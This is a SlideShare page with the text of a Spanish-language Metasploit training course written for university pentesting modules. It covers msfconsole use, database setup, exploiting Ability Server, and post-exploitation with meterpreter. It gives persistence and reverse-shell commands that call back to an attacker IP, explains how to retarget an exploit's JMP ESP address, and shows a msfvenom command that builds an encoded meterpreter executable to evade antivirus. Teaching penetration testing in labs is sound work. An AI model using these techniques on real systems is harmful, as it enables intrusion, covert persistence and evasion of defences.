SlideShare una empresa de Scribd logo

Curso de Metasploit

Ignacio Sorribas, profile picture
Ignacio Sorribas

Este documento proporciona una introducción al uso de Metasploit Framework. Explica las diferentes fases de un test de intrusión y cómo Metasploit puede ayudar especialmente en las fases de análisis de vulnerabilidades, explotación y post-explotación. Además, describe brevemente las principales herramientas de Metasploit como msfconsole, msfcli, msfpayload y msfvenom, y cómo iniciar la consola de Metasploit para comenzar a utilizarla.

Tecnología
1 de 36
Descargado 690 veces
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
    Curso  de  Metasploit  v0.5.                                                               Autor:  Ignacio  Sorribas  Mollar   Twitter:  @NachoSorribas   Web:  www.at4sec.com      
Metasploit  v0.5.   Índice     Índice  ............................................................................................................................................................  2   Changelog.  ..................................................................................................................................................  3   Introducción.  .............................................................................................................................................  4   Fases  de  un  test  de  intrusión.  ............................................................................................................  4   Comenzando  a  utilizar  Metasploit.  ..................................................................................................  5   Conectar  Metasploit  a  una  base  de  datos.  .................................................................................  10   Configurar  PostgreSQL  para  conectar  Metasploit  desde  cero.  ....................................  10   PostgreSQL  en  Kali  Linux.  ...........................................................................................................  13   Uso  de  la  Base  de  Datos  en  Metasploit.  ..................................................................................  14   Exploits  más  utilizados  en  servidores.  .......................................................................................  16   Exploits  “client  side”.  ..........................................................................................................................  16   Post-­‐Explotación.  .................................................................................................................................  17   Modificación  de  exploits  en  Metasploit.  .....................................................................................  21   Bypass  de  antivirus  con  Metasploit  .............................................................................................  26   Creación  de  un  “payload”  personalizado  que  evite  los  antivirus.  ..............................  28   Utilizar  Payloads  personalizados  desde  Metasploit.  .......................................................  33   Automatización  de  tareas  en  Metasploit.  ..................................................................................  34   Referencias.  ............................................................................................................................................  35      
Metasploit  v0.5.   Changelog.     10/06/2013.  Versión  0.1.     • Documento  inicial.   13/06/2013.  Versión  0.2.     • Añadido  pié  de  página  con  números  de  página.   • Documentación  del  proceso  de  creación  de  base  de  datos  msf3  de   Metasploit  en  postgresql.   02/07/2013.  Versión  0.3.   • Diseño  de  documento.   • Añadido  índice.     • Mejorada  sección  modificación  exploits.   03/07/2013.  Versión  0.4.   • Configuración  de  PostrgreSQL  desde  cero.   05/07/2013.  Versión  0.5.   • Utilizar  custom  payloads      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 4   Introducción.     Este   documento   ha   sido   creado   para   impartir   formación   sobre   Metasploit   Framework   en   el   Curso   de   Seguridad   Avanzada   de   la   Universitat   Jaume   I   de   Castellón  (UJI),  así  como  para  el  módulo  de  Pentesting  del  Curso  de  postgrado  de   Auditorías  Informáticas  de  la  Universitat  Politécnica  de  Valencia  (UPV).     El  documento  todavía  se  encuentra  en  fase  de  mejoras,  con  lo  que  irán  apareciendo   nuevas  versiones.  Cualquier  “feedback”  por  parte  de  los  lectores  será  bienvenido.   Los  datos  de  contacto  del  autor  se  encuentran  al  final  del  mismo  documento.     Metasploit   es   un   “Framework”   para   realizar   test   de   intrusión   desarrollado   por   Rapid   7.   Existen   3   versiones   de   Metasploit,   entre   ellas   la   “Community   Edition”   sobre  la  que  vamos  a  basar  este  módulo.  Las  otras  2  versiones  son  “Metasploit  Pro”   y  “Metasploit  Express”  que  son  de  pago.     Metasploit  incorpora  un  “set”  de  herramientas  (exploits,  scanners,  payloads,  etc)   que  cubren  perfectamente  todas  las  fases  de  un  test  de  intrusión  (pentest),  desde   la   adquisición   de   información   y   reconocimiento,   hasta   el   descubrimiento   de   vulnerabilidades,  su  explotación  y  post  explotación.     En   este   documento   vamos   a   intentar   mostrar   el   funcionamiento   de   esta   herramienta  mediante  la  realización  de  ejemplos  prácticos.  Para  la  realización  de   dichos   ejemplos,   se   empleará   una   distribución   Linux   llamada   “Kali   Linux”   o   su   predecesora  “BackTrack  5r3”.     A  día  de  hoy,  Metasploit  se  considera  la  verdadera  “navaja  suiza  del  Pentester”.     Fases  de  un  test  de  intrusión.     Las  fases  de  un  test  de  intrusión  son  las  siguientes:     • Alcance  y  términos  del  test  de  intrusión.   • Recolección  de  información.   • Análisis  de  vulnerabilidades.   • Explotación  de  las  vulnerabilidades.   • Post-­‐Explotación  del  sistema.   • Generación  de  informes.     Metasploit   puede   ayudarnos   sobre   todo   en   las   fases   de   análisis   de   vulnerabilidades,  explotación  y  post-­‐explotación.      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 5   Comenzando  a  utilizar  Metasploit.     Metasploit  consta  de  varias  herramientas  distintas:   • msfconsole.  Consola  de  Metasploit.   • msfcli.  Nos  permite  ejecutar  módulos  directamente  sin  entrar  en  la  consola.   • msfpayload.  Para  generar  payloads.   • msfencode.   Permite   codificar   los   payloads   para   quitar   null   bytes   por   ejemplo.   • msfvenom.     Combinación   de   msfpayload   y   msfencode   en   una   sola   herramienta.   • etc.     Para  las  tareas  de  este  módulo,  utilizaremos  “msfconsle”.     Así  pues,  arrancamos  nuestro  Metasploit.       Como  se  ve  en  la  imagen,  Metasploit  muestra  el  número  de  componentes  de  cada   uno   de   los   5   módulos   en   los   que   está   organizado   (exploits,   auxiliary,   payloads,   encoders  y  nops).     Para  obtener  ayuda  sobre  los  comandos  disponibles  dentro  de  la  consola  se  puede   escribir  “help”  y  pulsar  el  intro.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 6   Desde   la   propia   consola   se   pueden   ejecutar   comandos   del   propio   sistema   operativo  como  si  nos  encontráramos  en  la  Shell.       Un   comando   útil   e   importante   es   el   comando   “search”   que   nos   permite   buscar   dentro   de   los   módulos   de   Metasploit.   Por   ejemplo   vamos   a   buscar   el   exploit   de   “Ability  Server  2.34”.      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 7   Una  vez  localizado  el  “exploit”  deseado,  se  selecciona  mediante  el  comando  “use”.       El  comando  “show  options”  nos  muestra  las  opciones  de  configuración  que  acepta   el   “exploit”   escogido.   Algunas   vienen   ya   rellenadas   por   defecto,   pero   pueden   cambiarse  si  se  desea,  otras  hay  que  configurarlas  a  mano.  Así  pues  si  la  maquina   victima   tiene   la   dirección   IP   192.168.1.30,   se   utiliza   el   comando   “set”   para   configurar  la  variable  “RHOST”  (Remote  Host).       En  lugar  de  utilizar  “set”  para  configurar  las  variables,  podemos  utilizar  “setg”  (set   global)   lo   cual   configurará   la   variable   RHOST   de   forma   global,   con   lo   que   si   cambiamos  de  “exploit”  esta  ya  estará  configurada.     Todos  los  “exploits”  necesitan  un  “payload”  que  ejecutar  en  la  maquina  víctima,  así   que  debemos  seleccionar  uno.  Con  el  comando  “show  payloads”  podemos  ver  los   “payloads”  que  acepta  el  “exploit”  elegido.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 8       Una   vez   sabemos   que   payload   utilizar,   simplemente   lo   configuramos   con   el   comando  “set”.       Como  puede  verse  ahora  al  ejecutar  “show  options”  también  aparecen  las  opciones   del  payload,  las  cuales  deben  configurarse.  La  variable  “LHOST”  (Local  host)  debe   contener  la  dirección  IP  a  la  que  se  conectará  la  maquina  víctima  cuando  se  ejecute   el  “payload”.     Además,   también   hay   que   configurar   el   “target”   del   exploit,   ya   que   no   todos   los   exploit  sirven  para  todos  los  sistemas  operativos,  o  para  todas  las  versiones  de  uno   de  ellos.     Con  “show  targets”  vemos  los  objetivos  aceptados  por  el  exploit.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 9       Si  el  sistema  operativo  de  nuestra  maquina  objetivo  se  encuentra  entre  la  lista  de   sistemas   operativos   aceptados,   lo   elegimos   y   ya   estamos   listos   para   ejecutar   “exploit”.   Si   no   hay   que   modificar   el   exploit   para   que   acepte   a   nuestra   máquina   objetivo.       Ya  hemos  conseguido  una  Shell  en  nuestra  maquina  victima  utilizando  Metasploit.     Ahora   podemos   guardar   esta   configuración   para   que   la   próxima   vez   que   arranquemos  Metasploit  ya  esté  configurado  y  no  tener  que  repetir  nuevamente   los  pasos  anteriores.  Lo  haremos  con  el  comando  “save”,  el  cual  creará  el  fichero   “config”  dentro  del  directorio  “.msf4”  de  la  ruta  del  usuario  que  ejecuta  Metasploit   (root  en  este  caso).          
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 10   Conectar  Metasploit  a  una  base  de  datos.     Durante  la  realización  de  un  Pentest,  se  recopila  gran  cantidad  de  información  que   suele  reutilizarse  en  distintas  fases  del  test.  Para  ello,  Metasploit  puede  integrarse   con   una   base   de   datos   PostgreSQL   la   cual   permitirá   el   almacenamiento   de   la   información  recopilada  de  una  manera  ordenada  y  fácil  de  buscar.     Configurar  PostgreSQL  para  conectar  Metasploit  desde  cero.     Nota:  El  siguiente  proceso  se  basa  en  una  distribución  Debian  con  Metasploit  ya   instalado.  Si  se  va  a  realizar  en  otra  distribución  de  Linux  distinta,  el  proceso  de   instalación  de  PostgreSQL  variará,  pero  la  configuración  y  conexión  con  Metasploit   será  la  misma.     En  primer  lugar  instalaremos  PostgreSQL  en  nuestra  maquina.           Este  proceso  instalará  el  motor  de  base  de  datos  y  creará  los  usuarios  pertinentes   en  el  sistema  (puede  comprobarlo  con  un  “cat  /etc/passwd”).  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 11     Ahora  crearemos  dentro  de  PostgreSQL  un  usuario  para  Metasploit  y  una  base  de   datos  utilizando  los  siguientes  comandos:     #sudo  –s   #sudo  postgres   #createuser  msf  –P  –S  –R  –D     #createdb  –O  msf  msf   #exit   #exit     En  la  siguiente  captura  se  observa  el  resultado  de  los  comandos  mencionados.       Comprobamos  el  puerto  donde  se  ha  instalado  postgres  (5432  por  defecto).       Creamos   el   fichero   “database.yml”   en   la   ruta   donde   esté   instalado   Metasploit   (/opt/metasploit/database.yml  por  ejemplo),  y  añadimos  el  siguiente  contenido.     production:        adapter:  postgresql        database:  msf        username:  msf        password:  MetasploitMola        host:  127.0.0.1        port:  5432        pool:  75        timeout:  5     Nota:  La  contraseña  del  campo  “password”  es  la  que  hemos  introducido  al  crear  el   usuario  “msf”  en  PostgreSQL.     Creamos  una  variable  de  entorno  en  “/etc/profile”  para  que  Metasploit  sepa  donde   está  el  fichero  de  configuración  de  la  Base  de  Datos  y  recargamos  el  “profile”.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 12     #echo  export  MSF_DATABASE_CONFIG=/opt/metasploit/database.yml  >>  /etc/profile   #source  /etc/profile     Para   conectar   Metasploit   con   PostgreSQL,   ahora   necesitamos   instalar   algún   componente  más  de  ruby,  en  concreta  la  gema  “activerecord-­‐postgresql-­‐adapter”.     #gem  install  activerecord-­‐postgresql-­‐adapter         Ahora  arrancamos  Metasploit  con  el  comando  “msfconsole”.       Automáticamente   se   crearán   las   tablas   en   la   base   de   datos   creada   y   Metasploit   arrancará  conectado  al  base  de  datos.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 13   PostgreSQL  en  Kali  Linux.     Por  defecto  “Kali  Linux”  viene  con  un  servicio  “metasploit”  que  al  arrancarlo  crea  la   base  de  datos  para  Metasploit  y  configura  la  conexión  en  el  fichero  “database.yml”.   El   Fichero   de   configuración   de   la   base   de   datos   de   Metasploit   se   encuentra   en   “/opt/metasploit/apps/pro/ui/config/database.yml”.   Puede   localizarse   mediante   el  comando  “locate  database.yml”  desde  una  “Shell”.     En  primer  lugar  debe  arrancarse  el  servicio  de  postgresql.   root@kali#  service  postgresql  start     Una  vez  arrancado  “postgresql”  arrancamos  el  servicio  “metasploit”.   root@kali#  service  metasploit  start     Esto  creara  una  base  de  datos  llamada  “msf3”,  un  usuario  de  “PostgreSQL”  llamado   “msf3”  y  un  password  aleatorio  para  dicho  usuario.  Todos  esto  datos  los  guardará   en  el  fichero  “database.yml”  que  se  creará  en  la  ruta  nombrada  anteriormente.          
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 14   Después  arrancamos  “msfconsole.     A  partir  de  este  momento  podemos  consultar  el  estado  de  la  base  de  datos  con  el   comando  “db_status”  desde  dentro  de  la  consola  de  Metasploit.       Nota:   Si   al   arrancar   “msfconsole”   recibimos   un   error   indicando   que   no   hay   instancia   “production”   en   “database.yml”,   hay   que   editar   el   fichero   y   copiar   el   bloque   de   configuración   correspondiente   a   la   instancia   “development”   cambiándole   el   nombre   por   “production”.   Después   se   vuelve   a   arrancar   “msfconsole”  y  listo.     Uso  de  la  Base  de  Datos  en  Metasploit.     Una   vez   configurada   la   base   de   datos,   dentro   de   Metasploit   tenemos   lo   que   llamamos   “espacios   de   trabajo”   (workspace).   Por   defecto   existe   un   “workspace”   llamado  “default”,  que  es  al  que  va  a  parar  toda  la  información  recogida  a  menos   que   configuremos   un   “workspace”   para   el   trabajo   concreto   que   estamos   realizando.     Las  buenas  prácticas  dicen  que  para  cada  PenTest,  debemos  crear  un  workspace.     Podemos  crear  un  “workspace”  con  el  comando  “workspace  -­‐a  prueba”.     Podemos  asignarnos  al  “workspace”  prueba    con  el  comando  “workspace  prueba”.     Podemos  eliminar  el  “workspace”  con  “workspace  -­‐d  prueba”.      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 15     Cuando   nos   asignamos   a   un   workspace,     Metasploit   va   a   registrar   en   el   toda   la   información   a   cerca   de   hosts,   credenciales,   servicios,   vulnerabilidades,   etc   que   encuentre   mediante   la   utilización   de   cualquiera   de   los   módulos   auxiliares.   Por   ejemplo  si  lanzamos  un  ataque  de  fuerza  bruta  contra  el  host  192.168.100.39  y  se   consigue   un   credencial   válida,   mediante   el   comando   “creds”   veremos   las   credenciales.         Con  el  comando  “hosts”  veremos  los  hosts  que  hemos  atacado  o  analizado.       Otros  comandos  relacionados  con  los  “workspace”.       Una   vez   realizado   el   Test   de   intrusión,   generado   el   informe   final   y   entregado   al   cliente,  el  PenTester  puede  borrar  el  “workspace”  creado  para  dicho  Test  con  un   solo  comando  y  listo  (workspace  -­‐d  prueba).        
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 16   Exploits  más  utilizados  en  servidores.     La   gran   mayoría   de   los   exploits   para   servidores   del   arsenal   de   Metasploit   son   exploits  para  vulnerabilidades  ya  antiguas  y  ampliamente  conocidas.  Si  es  verdad   que  cuando  aparece  un  nuevo  0day,  normalmente  se  implementa  un  exploit  rápido   para  Metasploit,  la  mayoría  de  los  0day  hoy  en  día  van  orientados  a  cliente  (client   side)  y  no  a  software  de  servidor.     Aún   así,   muchos   de   los   exploits   existentes   siguen   funcionando   en   multitud   de   máquinas,  ya  que  no  todos  los  administradores  de  sistemas  mantienen  todos  sus   sistemas   actualizados,   e   incluso   muchas   máquinas   quedan   olvidadas   y   muchas   veces  conectadas  a  través  de  internet.     Algunos  de  los  exploits  más  conocidos  y  utilizados  de  Metasploit  son:     • MS08-­‐67-­‐netapi  (Win  2003,  XP).   • MS06-­‐40-­‐netapi  (Win  N.T).       • psexec  (pass  the  hash  –  Todos  los  Windows  2008  incluído).     • etc.     Exploits  “client  side”.     La  gran  mayoría  de  los  exploits  que  aparecen  cada  día  son  exploits  relacionados   con   software   de   escritorio,   los   cuales   se   utilizan   para   realizar   ataques   a   los   PC   cliente   los   cuales   pueden   utilizarse   después   para   pivotar   y   acceder   a   otras   máquinas  de  la  red  local  que  no  son  accesibles  desde  internet.     Estos  exploits  normalmente  van  dirigidos  contra  navegadores,  más  concretamente   contra  plugins  que  se  instalan  en  ellos.     Según   CVE-­‐Details,   Oracle   por   ejemplo   sufrió   unas   380   vulnerabilidades   en   los   distintos   software   que   posee,   y   ya   lleva   279   en   lo   que   llevamos   de   año   2013   (http://www.cvedetails.com/vendor/93/Oracle.html).     Si  buscamos  por  productos  por  ejemplo,  CVE-­‐Details  muestra  que  el  Flash  Player   sufrió  66  vulnerabilidades  en  2012  y  ya  lleva  44  en  2013,  43  de  las  cuales  permiten   la  ejecución  de  código  remoto  (http://www.cvedetails.com/product/6761/Adobe-­‐ Flash-­‐Player.html?vendor_id=53).     Para   utilizar   un   exploit   contra   un   software   determinado,   necesitamos   saber   exactamente  la  versión  de  dicho  software  para  encontrar  las  vulnerabilidades  que   lo  afectan  y  así  seleccionar  el  exploit  adecuado.    
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 17   Otra   opción   que   nos   ofrece   Metasploit   es   “browser_autopwn”,   un   módulo   que   levanta  todos  los  exploits  diseñados  para  los  distintos  navegadores,  el  cual  ante   una   conexión   de   un   cliente,   averigua   su   navegador   y   plugins   mediante   “fingerprinting”  y  con  esta  información  selecciona  un  exploit  adecuado  y  lo  lanza   contra   el   cliente.   Este   módulo   en   algunas   ocasiones   falla,   ya   que   no   siempre   es   posible  acertar  el  software  utilizado  mediante  “fingerprinting”.   Post-­‐Explotación.     El  proceso  de  post-­‐explotación  es  lo  que  se  realiza  una  vez  obtenido  acceso  a  la   maquina  objetivo.     Para   la   post-­‐explotación,   vamos   a   basarnos   en   una   Shell   de   “Meterpreter”,   el   payload  por  excelencia  de  Metasploit  y  partiendo  de  que  la  maquina  objetivo  es  un   windows  (la  mayoría  de  las  técnicas  servirán  también  en  Linux,  pero  nos  basamos   en   windows   porque   la   mayoría   de   estaciones   de   trabajo   utilizan   este   sistema   operativo).     El  primer  paso  es  asegurarnos  de  que  el  usuario  víctima  no  nos  corte  la  conexión  al   cerrar   el   navegador   por   ejemplo.   Para   esto   hay   que   migrar   el   proceso   de   meterpreter  a  uno  nuevo,  que  pertenezca  a  algún  programa  en  ejecución.  Así  pues   mediante  la  orden  “ps”  buscamos  el  id  del  proceso  “explorer.exe”  por  ejemplo  y   después  ejecutamos  “migrate  PID”  lo  cual  migrará  nuestro  meterpreter  de  proceso.       El  proceso  de  migrar  el  PID  lo  incorporan  automáticamente  algunos  exploits,  pero   en  el  caso  de  no  ser  así  es  recomendable  aplicarlo  tal  cual  se  ha  mostrado.     El  siguiente  paso  será  buscar  la  persistencia,  la  manera  de  poder  conectar  con  el   cliente   fácilmente   en   próximas   ocasiones.   Para   conseguir   esto   podemos   instalar   “meterpreter”   como   servicio   en   el   PC   objetivo   para   que   este   quede   escuchando   nuevas  conexiones.     Así  pues,  primero  veremos  las  opciones  que  nos  ofrece  “mtsvc”.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 18       El   servicio   lo   instalaremos   simplemente   con   el   comando   “run   metsvc”   lo   cual   dejará  un  puerto  a  la  escucha  de  conexiones.       Ahora   configuramos   un   “handler”   en   Metasploit   con   un   “payload”   especial   de   “metsvc”  y  lo  ejecutamos  para  conectar  en  el  momento  que  deseemos.       Este  método  solo  funcionará  si  el  host  víctima  no  está  detrás  de  ningún  firewall  y   podemos  acceder  a    su  puerto  31337  desde  internet.     Otro   método   sería   que   el   propio   PC   nos   lanzara   conexiones   a   nosotros,   lo   cual   permitiría  traspasar  el  firewall  sin  problemas.  Para  esto  está  “persistence.rb”,  un   script  de  “meterpreter”  que  hace  exactamente  lo  que  buscamos.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 19       Ahora,   con   el   comando   “run   persistence   –X   –i   60   –p   443   –r   192.168.100.64”   haremos  que  cada  60  segundos  el  PC  víctima  intente  conectar  al  puerto  443  de  la   dirección  IP  192.168.100.64,  donde  deberemos  tener  un  “handler”  de  Metasploit.         Una  vez  instalado  el  servicio,  cada  vez  que  deseemos  conectar  con  el  host  victima   debemos  configurar  un  “handler”  de  Metasploit  con  un  “payload”  de  “meterpreter  -­‐ >  reverse_tcp”.       Ahora,  tan  solo  hay  que  esperar  60  segundos  para  que  el  servicio  de  “meterpreter”   intente  contactar  con  nuestro  Metasploit.      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 20   Nota:   El   servicio   “meterpreter”   instalado   no   requiere   de   autenticación,   lo   cual   indica  que  cualquiera  que  utilice  un  “handler”  de  Metasploit  utilizando  la  IP  para  la   que  hemos  configurado  el  servicio  podría  contactar  con  la  máquina  víctima,  por  lo   tanto  no  se  debe  lanzar  el  servicio  por  ejemplo  contra  una  IP  pública  dinámica  que   después   pueda   utilizar   otra   persona   (IPs   de   universidades,   cibercafés,   etc).   Lo   mismo   pasa   con   el   “metsvc”   anterior,   cualquiera   que   intente   conectar   con   el   “payload”  adecuado  al  puerto  31337  podrá  acceder.     Nota   2:   El   servicio   “metsvc”   puede   desinstalarse   ejecutando   desde   la   Shell   de   meterpreter  “run  metsvc  –r”,  pero  el  servicio  “persistence”  no,  hay  que  eliminar  la   clave   de   “auto   run”   del   registro   y   matar   el   proceso   “wscript.exe”   (HKLMSoftwareMicrosoftWindowsCurrentVersionRunxxxx….).      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 21   Modificación  de  exploits  en  Metasploit.     Algunos   de   los   exploits   existentes   (tanto   exploits   de   Metasploit   como   exploits   independientes)   dependen   mucho   del   sistema   operativo   objetivo   de   la   maquina   objetivo.     Así  pues  si  por  ejemplo  vamos  a  utilizar  un  exploit  para  el  software  “Ability  Server   2.34”  y  el  exploit  ha  sido  desarrollado  para  atacar  un  Windows  XP  SP3  en  Inglés,   no  nos  va  a  funcionar  en  un  Windows  XP  SP3  en  Español.     ¿Por  qué?     Por   que   cada   versión   de   Windows,   cada   idioma,   cada   Service   Pack,   carga   sus   instrucciones   internas   en   posiciones   de   memoria   distintas,   y   estos   exploits   necesitan  conocer  la  dirección  de  memoria  de  por  ejemplo  una  instrucción  “jmp   esp”  para  poder  funcionar.     Como   los   exploits   no   son   mas   que   un   trozo   de   código,   nada   impide   que   los   podamos  modificar  a  nuestro  antojo  para  adecuarlos  a  nuestro  sistema  objetivo.     En  la  imagen  siguiente  se  puede  ver  los  “targets”  del  exploit  “ability_server_stor”   de  Metasploit.       Como  se  puede  ver  este  exploit  funciona  con  Windows  XP  SP2  y  SP3  en  Inglés.  Por   lo  tanto  si  lo  queremos  utilizar  contra  un  XP  SP3  en  Español  no  funcionará.     Vamos  a  modificar  este  exploit  para  que  funcione  contra  nuestra  máquina  objetivo.   Para  ello  primero  buscamos  el  exploit  en  el  sistema  de  ficheros  (dependiendo  de  la   instalación  de  Metasploit  puede  encontrarse  en  lugares  distintos).      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 22     Una  vez  localizado  el  fichero,  crearemos  la  misma  estructura  de  directorios  que   hay   en   “metasploit-­‐framework”   dentro   del   directorio   “.msf4”   del   “home”   del   usuario  y  copiaremos  allí  el  fichero  de  nuestro  exploit.     Este  paso  se  realiza  porque  si  modificamos  el  exploit  en  su  directorio  original,  en   cuando  hagamos  un  “update”  de  Metasploit,  nuestros  cambios  desaparecerán  ya   que  en  el  repositorio  de  Metasploit,  está  el  exploit  original.     Editamos  el  fichero  de  exploit.  Los  exploits  de  Metasploit  están  escritos  en  “Ruby”,   aunque  no  es  necesario  ser  experto  en  este  lenguaje  para  modificar  un  exploit  ya   que  es  bastante  intuitivo.     Dentro  del  exploit  buscamos  donde  se  definen  los  “targets”.         Como   puede   verse   en   la   imagen   anterior,   a   “Ret”   se   le   asigna   una   dirección   de   memoria   la   cual   corresponde   a   la   instrucción   “JMP   ESP”   tal   como   dice   el   comentario  dentro  del  propio  exploit  (Nos  dicen  incluso  de  que  dll  lo  han  sacado).     Entonces  necesitamos  buscar  en  que  dirección  de  memoria  hay  un  “JMP  ESP”  en   nuestro  Win  XP  SP3  Español.     Abrimos  un  “debugger”  como  “OllyDB”  o  “Immunity  Debugger”  en  nuesto  windows   y  hacemos  un  “Attach”  a  alguno  de  los  procesos  en  ejecución  (para  este  ejemplo  se   ha  hecho  “attach”  de  “explorer.exe).       Después   sacamos   los   módulos   cargados   (icono   con   una   “e”   en   Immunity).   Buscamos  por  ejemplo  el  “USER32.DLL”  y  lo  abrimos  con  doble  click.     Una  vez  en  la  ventana  del  modulo  “USER32”,  pulsamos  “Ctrl  +  F”  para  buscar  y  en   el  cuadro  de  dialogo  escribimos  “JMP  ESP”  y  pulsamos  en  buscar.     El  resultado  se  ve  en  la  siguiente  imagen:  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 23       En   la   columna   de   la   izquierda   se   encuentran   las   direcciones   de   memoria   donde   están  las  instrucciones  que  hay  en  la  tercera  columna  (la  segunda  columna  es  el   “opcode”  que  representa  la  instrucción).     Como  vemos  la  instrucción  “JMP  ESP”  está  en  “7E3A9353”.  En  el  caso  de  que  la   dirección  de  memoria  resultante  de  la  búsqueda  contenga  algún  byte  nulo  (0x00),   hay  que  buscar  otra  vez  hasta  encontrar  una  que  no  tenga  bytes  nulos,  ya  que  si   hay  un  byte  nulo  en  el  “shellcode”  de  un  exploit,  esto  se  considera  una  terminación   de   cadena   y   dicho   shellcode   no   carga   entero   (hay   que   tener   en   cuenta   que   la   inyección  de  código  siempre  se  hace  con  funciones  de  tratamiento  de  cadenas  y   estas  cortan  la  cadena  cuando  encuentran  un  byte  nulo).     Utilizando   esta   dirección   de   memoria   ya   podemos   modificar   nuestro   exploit,   añadiendo   una   sección   para   el   Windows   XP   SP3   Español,   el   cual   quedará   de   la   siguiente  forma:  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 24       Después   se   recargan   los   módulos   en   Metasploit   y   nuestro   exploit   muestra   los   siguientes  “targets”.       Ahora  configuramos  el  exploit  para  probarlo  contra  nuestro  sistema  objetivo.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 25       Y  lo  ejecutamos.       Como  podemos  ver  en  la  imagen  anterior,  en  la  maquina  atacante  recibimos  una   conexión  de  la  maquina  objetivo  la  cual  nos  entrega  una  Shell  de  “meterpreter”  (el   “payload”  por  excelencia  de  Metasploit).     Hemos  conseguido  acceso  al  sistema.      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 26   Bypass  de  antivirus  con  Metasploit     La  mayoría  de  antivirus  funcionan  por  firmas  de  software.  Contienen  una  base  de   datos   con   las   firmas   de   exploits,   virus,   malwares,   etc,   y   en   cuanto   detectan   un   elemento  que  se  corresponde  con  dicha  firma  automáticamente  lo  bloquean  y  lo   ponen  en  cuarentena.     Para   probar   esto,   hemos   instalado   en   antivirus   gratuito   “AVG   FREE”   en   nuestra   máquina  objetivo  con  el  “Ability  Server  2.34”  instalado.     Si  probamos  ha  ejecutar  nuestro  exploit  otra  vez,  sigue  funcionando  sin  problemas   ya   que   Metasploit   carga   el   “meterpreter”   inyectando   una   DLL   directamente   en   memoria  y  la  mayoría  de  antivirus  no  analizan  la  memoria  en  tiempo  real  (algunos   si  lo  hacen).         Ahora  utilizamos  la  aplicación  “msfpayload”  de  Metasploit  para  crear  un  ejecutable   de  “meterpreter”  para  windows.         Este   ejecutable   lo   intentamos   ejecutar   en   la   maquina   con   antivirus   y   pasa   lo   siguiente.  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 27       Nuestro  AVG  detecta  el  “payload”  como  peligroso  y  no  permite  que  se  ejecute.     Podemos   intentar   ofuscarlo   con   las   herramientas   que   proporciona   Metasploit   como   “msfencode”   o   generarlo   directamente   con   “msfvenom”   que   realiza   en   un   mismo  proceso  lo  que  se  hace  encadenando  “msfpayload”  y  “msfencode”.     Así  con  “msfvenom  –p  windows/meterpreter/reverse_tcp  LHOST=192.168.100.64   LPORT=4444   –b   ‘x00xff’   –e   x86/shikata_ga_nai   –i3   –f   exe   >   met_rev2.exe”   crearemos   el   mismo   ejecutable   pero   ofuscado   utilizando   3   rondas   de   codificado   “shikata_ga_nai”.            
